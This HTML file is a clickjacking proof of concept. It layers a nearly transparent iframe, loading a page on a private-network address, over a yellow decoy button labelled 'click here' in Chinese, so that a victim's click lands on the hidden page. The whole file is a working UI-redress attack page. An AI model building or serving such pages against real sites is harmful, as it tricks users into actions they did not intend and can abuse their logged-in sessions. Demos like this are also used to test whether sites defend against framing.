<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>点击劫持</title>
    <style type="text/css">
        *{
            margin: 0;
            padding: 0;
        }
        body{
            overflow: hidden;
        }
        .fake-button{
            width: 260px;
            height: 38px;
            background-color: yellow;
            text-align: center;
            line-height: 38px;
            position: absolute;
            top: 164px;
            left: 564px;
        }
        .iframe{
            width: 100%;
            height: 800px;
            opacity: 0.1;
            position: absolute;
            top: 0;
            left: 0;
            overflow: hidden;
        }
    </style>
</head>
<body>
    <div class="fake-button">点击此处</div>
    <iframe class="iframe" src="http://10.0.10.216:8688/view/index" scrolling="no"></iframe>
</body>
</html>